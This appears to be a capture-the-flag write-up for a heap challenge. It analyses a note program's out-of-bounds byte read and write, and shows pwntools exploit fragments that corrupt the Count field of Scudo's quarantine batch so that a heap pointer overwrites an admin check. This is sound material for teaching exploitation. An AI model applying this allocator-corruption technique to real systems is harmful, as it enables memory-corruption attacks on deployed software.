Wizard's Diary
Difficulty: Hard
Classification: Official
Synopsis
Wizard's Diary is a Hard pwn challenge built around the Scudo Allocator's quarantine
implementation: corrupting the quarantine's bookkeeping structure yields a Write-Where-Ptr primitive.
Skills Learned
Scudo Allocator
Analysis
We are given a Dockerfile which loads a binary wizards_diary and serves it. We see in
run.sh that some additional options are listed:
$ cat run.sh
export SCUDO_OPTIONS="thread_local_quarantine_size_kb=64:quarantine_size_kb=256:quarantine_max_chunk_size=2048"
export LD_PRELOAD="./libscudo.so"
./wizards_diary
Another shared library, libscudo.so, is loaded through LD_PRELOAD, and it reads its configuration
from the SCUDO_OPTIONS environment variable. Some research tells us that the Scudo
Allocator is a hardened allocator that "provides additional mitigation against heap based
vulnerabilities, while maintaining good performance". Among other things, it has been the default
allocator on Android since Android 11. We'll analyse it in more depth later.
Protections
We'll start with a checksec :
As we can see:
Decompilation
main()
Classic setup for a heap note challenge:
int __fastcall __noreturn main(int argc, const char **argv, const char **envp)
{
  int choice; // [rsp+8h] [rbp-8h]
  int not_suitable; // [rsp+Ch] [rbp-4h]

  not_suitable = 0;
  setup(argc, argv, envp);
  puts("=*=*= Welcome to University of Magic! =*=*=");
  puts("This app was created to aid the learning process of new magicians!");
  login();
  for ( choice = get_option(); ; choice = get_option() )
  {
    if ( !choice )
    {
      puts("Leaving University...");
      exit(0);
    }
    if ( choice == 1337 )
    {
      if ( *(_DWORD *)(logged_in_magician + 4) && *(_DWORD *)logged_in_magician )
      {
        system("cat flag.txt");
        exit(1337);
      }
      puts("You are not admin!");
    }
    else
    {
      if ( choice > 1337 )
        goto LABEL_20;
      if ( choice == 4 )
      {
        show_note();
        continue;
      }
      if ( choice > 4 )
        goto LABEL_20;
      if ( choice != 3 )
      {
        if ( choice == 1 )
        {
          new_note();
          continue;
        }
        if ( choice == 2 )
        {
          remove_note();
          continue;
        }
LABEL_20:
        puts("There is no such option!");
        continue;
      }
      if ( not_suitable )
      {
        puts("It seems you are not suitable to be in here...");
        exit(-2);
      }
      fix_note();
      not_suitable = 1;
    }
  }
}
Call login()
If 0, quit
If 1, call new_note()
If 2, call remove_note()
If 3, call fix_note(), but only once: a second attempt exits the program
If 4, call show_note()
If 1337 (secret option), perform a check and read flag.txt if it's passed
Obviously, the last one is of the most interest here, but let's go in order.
login()
After some cleaning up, it looks like this:
  canary = __readfsqword(0x28u);
  printf("Name: ");
  fgets(name, 32, stdin);
  if ( strcmp(name, "guest\n") )
  {
    if ( !strcmp(name, "admin\n") )
      puts("If you are indeed the admin, you won't have problem changing your account from guest to admin, right?");
    exit(0);
  }
  new_magician = (char *)malloc(8008uLL);
  *(_DWORD *)new_magician = 0;
  *((_DWORD *)new_magician + 1) = 0;
  printf("Enter a comment to your guest account: ");
  fgets(new_magician + 8, 8000, stdin);
  logged_in_magician = (__int64)new_magician;
}
The user is asked for a name. If it isn't guest, the program exits. Otherwise, a chunk of size 8008 is
allocated and its first 8 bytes are zeroed. The user is then asked for a comment, which is read into
the remaining 8000 bytes of the allocated chunk.
This looks like an allocation for a Magician struct. We don't know what the first 8 bytes are, but
they are treated as two DWORDs, so we'll type them as two integers for now:
struct Magician {
  int a;
  int b;
  char comment[8000];
};
The decompilation looks cleaner once the types are changed to Magician *:
  canary = __readfsqword(0x28u);
  printf("Name: ");
  fgets(name, 32, stdin);
  if ( strcmp(name, "guest\n") )
  {
    if ( !strcmp(name, "admin\n") )
      puts("If you are indeed the admin, you won't have problem changing your account from guest to admin, right?");
    exit(0);
  }
  new_magician = (Magician *)malloc(0x1F48uLL);
  new_magician->a = 0;
  new_magician->b = 0;
  printf("Enter a comment to your guest account: ");
  fgets(new_magician->comment, 0x1F40, stdin);
  logged_in_magician = new_magician;
}
get_option()
__int64 get_option()
{
  unsigned int opt; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 canary; // [rsp+8h] [rbp-8h]

  canary = __readfsqword(0x28u);
  opt = 0;
  menu();
  __isoc99_scanf("%d", &opt);
  return opt;
}
No vulnerabilities here.
new_note()
  canary = __readfsqword(0x28u);
  idx = 0;
  while ( notes[idx] )
  {
    if ( (int)++idx > 15 )
    {
      puts("You can't add more notes!");
      return;
    }
  }
  chnk = (int *)malloc(0x10uLL);
  size = 0;
  printf("Size of note: ");
  __isoc99_scanf("%d", &size);
  *chnk = size;
  *((_QWORD *)chnk + 1) = malloc(*chnk);
  if ( !*((_QWORD *)chnk + 1) )
  {
    puts("Malloc error!");
    exit(-1);
  }
  printf("Note: ");
  read(0, *((void **)chnk + 1), *chnk);
  printf("Added note with idx %d \n", idx);
  notes[idx] = chnk;
}
It allocates a new 16-byte chunk. The first 8 bytes contain the size, the second 8 bytes contain a
pointer to another chunk that holds the data. It looks like a struct Note:
struct Note {
  long size;
  char *data;
};
The size is only ever accessed as a 4-byte value, so typing it as a long litters the decompilation
with SLODWORD macros. Instead I'll make it an int, followed by an int junk to cover the padding:
struct Note {
  int size;
  int junk;
  char *data;
};
With these modifications, it looks like this:
  canary = __readfsqword(0x28u);
  idx = 0;
  while ( notes[idx] )
  {
    if ( (int)++idx > 15 )
    {
      puts("You can't add more notes!");
      return;
    }
  }
  note = (Note *)malloc(0x10uLL);
  size = 0;
  printf("Size of note: ");
  __isoc99_scanf("%d", &size);
  note->size = size;
  note->data = (char *)malloc(note->size);
  if ( !note->data )
  {
    puts("Malloc error!");
    exit(-1);
  }
  printf("Note: ");
  read(0, note->data, note->size);
  printf("Added note with idx %d \n", idx);
  notes[idx] = note;
}
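As a quick sanity check on the Note layout guessed above, the following sketch rebuilds it with Python's ctypes and confirms that it fills exactly the 0x10 bytes passed to malloc. The Python class and the use of c_uint64 as a stand-in for the char * pointer are illustrative assumptions (a 64-bit target is assumed), not something taken from the binary.

```python
import ctypes

class Note(ctypes.Structure):
    # Mirrors the guessed layout: 4-byte size, 4 bytes of padding, 8-byte pointer.
    _fields_ = [
        ("size", ctypes.c_int),
        ("junk", ctypes.c_int),
        ("data", ctypes.c_uint64),  # stand-in for `char *data` on x86-64 (assumption)
    ]

note_size = ctypes.sizeof(Note)   # total size of the struct
data_offset = Note.data.offset    # where the data pointer starts
print(hex(note_size), data_offset)
```

The data pointer sitting at offset 8 matches the *((_QWORD *)chnk + 1) accesses in the raw decompilation.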
remove_note()
  canary = __readfsqword(0x28u);
  idx = 0;
  printf("Index of note: ");
  __isoc99_scanf("%d", &idx);
  if ( idx <= 0xF && notes[idx] )
  {
    free((void *)notes[idx]);
    notes[idx] = 0LL;
    puts("Removed!");
  }
  else
  {
    puts("Wrong index");
  }
}
Simply removes a note, freeing the Note struct and nulling out the index. Note that the data field
of the Note struct is not freed, however.
fix_note()
  canary = __readfsqword(0x28u);
  idx = 0;
  offset = 0;
  printf("Index of note: ");
  __isoc99_scanf("%d", &idx);
  if ( idx <= 0xF && notes[idx] )
  {
    printf("Offset to fix: ");
    __isoc99_scanf("%d", &offset);
    getchar();
    printf("Correct byte: ");
    __isoc99_scanf("%c", &notes[idx]->data[offset]);
    puts("Fixed!");
  }
  else
  {
    puts("Wrong index");
  }
}
This is where the bugs start. A note index is asked for, and then an offset. The byte at data[offset]
is then overwritten with user input, but offset is never checked against the size of the note, allowing
for a single-byte relative write. Remember that fix_note() can only be called once: main() exits on a
second attempt.
show_note()
  canary = __readfsqword(0x28u);
  idx = 0;
  offset = 0;
  printf("Index of note: ");
  __isoc99_scanf("%d", &idx);
  if ( idx <= 0xF && notes[idx] )
  {
    printf("Offset to show: ");
    __isoc99_scanf("%d", &offset);
    getchar(); // consume newline
    printf("Byte: ");
    printf("%c\n", (unsigned int)notes[idx]->data[offset]);
  }
  else
  {
    puts("Wrong index");
  }
}
Exact same vulnerability, but this time for reading. This is not restricted by only being available
once.
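Since the read primitive returns one byte per request, wider values have to be stitched together by hand. The helper below is a minimal sketch of that idea: read_qword and its read_byte callback are hypothetical names, with read_byte standing for any function that returns the single byte found at a given offset from the note's data.

```python
def read_qword(read_byte, offset):
    """Assemble a little-endian QWORD from eight single-byte reads."""
    raw = b"".join(read_byte(offset + k) for k in range(8))
    return int.from_bytes(raw, "little")

# Offline stand-in for the remote read: eight bytes holding an example pointer.
fake_memory = (0x7F1785E0B028).to_bytes(8, "little")
value = read_qword(lambda off: fake_memory[off:off + 1], 0)
print(hex(value))
```

Against the real service, the callback would also have to cope with bytes that the receiving code treats specially, such as newlines and other whitespace.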
Summary
If we go back to main() , we can again see the criteria for entering 1337 using our newly-modified
structs:
if ( choice == 1337 )
{
  if ( logged_in_magician->b && logged_in_magician->a )
  {
    system("cat flag.txt");
    exit(1337);
  }
  puts("You are not admin!");
}
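An initial thought could be to overwrite a and b with the out-of-bounds write, but it writes a single
byte and can only be used once, while both fields must be non-zero. We need a different approach.
Recall the Scudo options set in run.sh: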
thread_local_quarantine_size_kb=64
quarantine_size_kb=256
quarantine_max_chunk_size=2048
It seems like we're using Scudo's quarantine functionality. The last option,
quarantine_max_chunk_size, ensures it's used for struct Note allocations, but not struct
Magician allocations (which are 8008 bytes). Whether or not it's used for the data part of Note
structs depends on which size value we input.
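To make the effect of these options concrete, here is a small sketch that parses the SCUDO_OPTIONS string and applies a simplified model of the size check. Both function names are made up for illustration, and the rule "quarantined when the quarantine is enabled and the chunk is no larger than quarantine_max_chunk_size" is an assumption about Scudo's behaviour rather than a copy of its code.

```python
RAW = "thread_local_quarantine_size_kb=64:quarantine_size_kb=256:quarantine_max_chunk_size=2048"

def parse_scudo_options(raw):
    """Split a colon-separated key=value string into a dict of ints."""
    return {key: int(value) for key, value in (item.split("=") for item in raw.split(":"))}

def goes_to_quarantine(size, opts):
    # Simplified assumption: the quarantine must be enabled and the chunk
    # must not exceed the configured maximum size.
    return opts["quarantine_size_kb"] > 0 and 0 < size <= opts["quarantine_max_chunk_size"]

opts = parse_scudo_options(RAW)
for name, size in [("Note", 0x10), ("Magician", 8008)]:
    print(name, goes_to_quarantine(size, opts))
```

Under this model a freed Note struct is quarantined, while the 8008-byte Magician chunk would bypass the quarantine.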
Scudo Quarantines are superseded by ARM MTE, which comes in the latest Android versions. The
official Scudo documentation has the following to say about quarantining:
The Quarantine: offers a way to delay the deallocation operations, preventing blocks to be
immediately available for reuse. Blocks held will be recycled once certain size criteria are
reached. This is essentially a delayed freelist which can help mitigate some use-after-free
situations. This feature is fairly costly in terms of performance and memory footprint, is
mostly controlled by runtime options and is disabled by default.
struct QuarantineBatch {
  // With the following count, a batch (and the header that protects it) occupy
  // 4096 bytes on 32-bit platforms, and 8192 bytes on 64-bit.
  static const u32 MaxCount = 1019;
  QuarantineBatch *Next;
  uptr Size;
  u32 Count;
  void *Batch[MaxCount];
};
QuarantineBatch structs are kept in a linked list stored in a QuarantineCache struct. This excellent
un1fuzz article describes the structure of the quarantine-related classes; among other fields, each
QuarantineBatch stores:
Size, which is the total size of the quarantined nodes recorded in this batch plus the
size of the QuarantineBatch itself
Count, which keeps track of how many nodes are in the Batch array
This QuarantineBatch structure is stored on the heap, along with all of our chunks as well. When
a user frees a chunk, the push_back() function will be called. push_back() is responsible for
adding a pointer to this chunk in the structure:
void push_back(void *Ptr, uptr Size) {
  Batch[Count++] = Ptr;
  this->Size += Size;
}
The latest version of the quarantine has a check to ensure that Count < MaxCount , but that was
not there at the time of the challenge release (thankfully!):
DCHECK_LT(Count, MaxCount);
Finally, Scudo also randomises allocation locations, as if the other defences weren't enough.
Exploitation
Plan
We want to overwrite the two integers a and b (together one QWORD) at the location of
logged_in_magician with something that isn't null. To do this, we will spend the single one-byte
overwrite on the Count field of the QuarantineBatch structure so that, after some further frees,
Batch[Count] aliases logged_in_magician->a. The next free then writes a heap address to this
location, which makes both a and b non-null, passing the check and allowing us to receive the flag.
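The effect this plan relies on can be reproduced with a toy model of the unchecked push_back(). Everything in the sketch is illustrative: memory is a flat list of QWORD slots starting at Batch[0], the distance of 0x7fd slots is only an example value, and the pointer being pushed is made up.

```python
import struct

class BatchModel:
    """Toy model of QuarantineBatch over a flat list of QWORD slots."""
    def __init__(self, slots, count):
        self.slots = slots   # slots[0] plays the role of Batch[0]
        self.count = count

    def push_back(self, ptr):
        # Same as the unchecked original: Batch[Count++] = Ptr
        self.slots[self.count] = ptr
        self.count += 1

MAGICIAN_SLOT = 0x7FD               # example distance, in QWORDs, to the Magician
memory = [0] * (MAGICIAN_SLOT + 1)  # memory[MAGICIAN_SLOT] holds a (low) and b (high)

batch = BatchModel(memory, count=MAGICIAN_SLOT)  # Count once it has reached the target
batch.push_back(0x7F1785E0C010)                  # made-up pointer to a freed chunk

a, b = struct.unpack("<II", struct.pack("<Q", memory[MAGICIAN_SLOT]))
print(hex(a), hex(b))
```

Because a userland heap pointer has non-zero bits in both its low and high DWORD, a single write of this kind is enough to satisfy both halves of the admin check.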
Setup
Normal setup of helper functions:
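from pwn import *

p = remote('127.0.0.1', 1337)

def remove_note(idx):
    p.sendlineafter(b'> ', b'2')
    p.sendlineafter(b':', str(idx).encode())

# prompts follow the show_note() decompilation: index, offset, then "Byte: "
def show_note(idx, offset):
    p.sendlineafter(b'> ', b'4')
    p.sendlineafter(b':', str(idx).encode())
    p.sendlineafter(b':', str(offset).encode())
    p.recvuntil(b'Byte: ')
    b = p.recvline().rstrip()
    return b

# basic setup
p.sendlineafter(b'Name: ', b'guest')
# comment, located 8 bytes after the desirable location
p.sendline(b'i'*8)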
Let's debug this. Scudo doesn't use the glibc heap, so vis_heap_chunks won't show its chunks, but we
can search the writeable regions in GDB:
If we print out large chunks of this region, everything appears to be null, so let's search for
Count, which currently holds the value 4, and see where that is. We'll assume it's in the same region:
So:
Batch[0] at 0x7f1785e0b028
Now we just need to work out the offset from Batch[0] to logged_in_magician->a, which is
0x3fe8 bytes. That's 0x3fe8 / 8 = 0x7fd QWORDs, so Count needs to reach 0x7fd.
Remember, we can only write one byte. What we're going to do is write the higher byte of the
target, the 0x7, to the second LSB of Count, making it 0x704. We can then allocate and free
0x7fd - 0x704 = 0xf9 chunks to gradually increment Count from 0x704 to 0x7fd, at which point the
next free writes its pointer to Batch[0x7fd].
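The arithmetic for this particular run can be checked in a few lines. The variable names are illustrative; the numbers are the ones measured above.

```python
offset = 0x3FE8                  # bytes from Batch[0] to logged_in_magician->a in this run
target = offset // 8             # Batch index that aliases the Magician
count = 0x04                     # Count observed before the write

high_byte = target >> 8          # the single byte we get to write
corrupted = (count & 0xFF) | (high_byte << 8)   # Count right after the write
increments = target - corrupted  # frees needed before Count equals target

print(hex(target), hex(high_byte), hex(corrupted), hex(increments))
```

This only works when the low byte of the target is at least the current low byte of Count, because frees can only move Count upwards.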
One more thing to note: this offset is not constant. Scudo randomises where chunks are placed and
when they are reused in order to combat heap exploits. We'll have to calculate this
distance dynamically, and to do this we'll abuse the byte read functionality. We'll start at offset 0
and keep reading until we have found both an i character (the start of logged_in_magician->comment,
8 bytes after a) and a \x04 byte (the Count).
batch_0 = 0
comment = 0
i = 0
# read one byte every 8 bytes until both markers have been found
while not (batch_0 and comment):
    c = show_note(0, i)
    # found `Count`!
    if c == b'\x04':
        log.success(f'Found Count at i = {i}!')
        # Batch[0] is 8 after Count
        batch_0 = i + 8
    # found our `comment`!
    elif c == b'i':
        log.success(f'Found comment at i = {i}!')
        # a is 8 before comment
        comment = i - 8
    i += 8
Occasionally the comment will be lower in memory than Count , in which case this is not possible,
so we exit early:
Then we work out how many Batch indices the byte offset from Batch[0] to logged_in_magician->a
(comment - batch_0 in the scan above) corresponds to:
idx_count = offset // 8
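The early exit and the index calculation can be folded into one helper. This is a sketch under the assumption that batch_0 and comment hold the offsets recorded by the scan (Batch[0] and logged_in_magician->a respectively); batch_index is a hypothetical name, and the example offsets are invented so that their difference matches the 0x3fe8 seen earlier.

```python
def batch_index(batch_0, comment):
    """Turn the two scan results into the Batch index of logged_in_magician->a."""
    if comment <= batch_0:
        # Batch[] can only be indexed upwards, so this layout is not exploitable.
        raise ValueError("Magician is below the batch; reconnect and retry")
    offset = comment - batch_0
    if offset % 8:
        raise ValueError("offset is not QWORD-aligned")
    return offset // 8

idx_count = batch_index(0x2008, 0x2008 + 0x3FE8)  # example offsets, not from a real run
print(hex(idx_count))
```

Raising an exception rather than exiting keeps the decision about retrying with the caller.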
The high byte of idx_count is the value we want to write to the second LSB of Count. We'll do that
now with our one write:
log.info(f'Lots of frees')
Note that we use a single loop that allocates a note and then frees it immediately. This is not as
reliable as doing all of the allocations first and all of the frees afterwards, as Scudo can reuse
chunks in between, but we are allowed a maximum of 16 notes (indices 0 to 15) at any one time,
so we'll have to deal with it.
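A minimal sketch of such a loop is shown below. The helper signatures are assumptions: new_note(size, data) is taken to return the index reported by the binary, and remove_note(idx) to free that note. To keep the example runnable offline, two stand-in functions imitate the note table instead of talking to the service.

```python
def bump_count(new_note, remove_note, frees, size=16):
    """Allocate and immediately free `frees` notes, one at a time."""
    for _ in range(frees):
        idx = new_note(size, b"A" * size)
        remove_note(idx)

# Stand-ins for the real pwntools helpers, so the sketch runs offline.
live, freed = set(), []

def fake_new_note(size, data):
    idx = min(set(range(16)) - live)  # the binary picks the first empty slot
    live.add(idx)
    return idx

def fake_remove_note(idx):
    live.remove(idx)
    freed.append(idx)

bump_count(fake_new_note, fake_remove_note, 0xF9)
print(len(freed), max(freed))
```

Only one extra slot is ever occupied at a time, which is what keeps the loop within the note limit.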
Finally, send 1337 and get the flag!
# get flag
log.info('Printing Flag...')
p.sendlineafter(b'> ', b'1337')
flag = p.recvline().decode()
log.success(f'Flag: {flag}')
The exploit works, but not with a 100% success rate, due to the aforementioned randomisation
problems:
We get the fake flag! Now we just have to run it against the remote instance and grab the actual
flag. It takes a while (and a few tries), but eventually the flag comes back.
Improving Efficiency
The exploit takes a while, so there are a couple of things we can do to speed it up. Count is always
16-byte aligned, so we can increase i by 16 each time rather than 8. comment, on the other hand,
always ends in an 8 in hex: it's always 8 more than a 16-byte alignment. That's not a problem, as
we can increment by 16 each time, and once we find Count we can increment by 8 once to shift
onto comment's alignment. We can also initialise i as 8176, as that's the (arbitrarily chosen) size
of the Note data in the first place, so anything we're looking for must lie beyond it. The former
halves the number of requests on average, and the latter saves a further 8176 // 16 = 511 requests.
i += 16
c = show_note(0, i)
# found `Count`!
if c == b'\x04':
    log.success(f'Found Count at i = {i}!')
    # Batch[0] is 8 after Count
    batch_0 = i + 8
    i += 8
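Put together, the faster scan could look like the sketch below. It is an offline illustration rather than the original exploit code: scan and read_byte are hypothetical names, read_byte stands in for show_note(0, i), the fake memory layout is invented, and only the case where comment lies above Count is handled.

```python
def scan(read_byte, start=8176, limit=1 << 20):
    """Return (count_off, comment_off), stepping 16 bytes at a time."""
    count_off = None
    i = start
    while i + 16 < limit:
        i += 16
        c = read_byte(i)
        if count_off is None:
            if c == b"\x04":
                count_off = i
                i += 8            # shift onto comment's 8-mod-16 alignment
        elif c == b"i":
            return count_off, i
    raise RuntimeError("markers not found")

# Invented layout: Count at a 16-byte aligned offset, comment at 8 mod 16 above it.
mem = bytearray(20000)
mem[8336] = 0x04
mem[8440] = ord("i")
reads = []

def fake_read(off):
    reads.append(off)
    return bytes(mem[off:off + 1])

result = scan(fake_read, limit=len(mem))
print(result, len(reads))
```

With this layout the scan needs 16 reads, compared with over a thousand when starting from offset 0 in steps of 8.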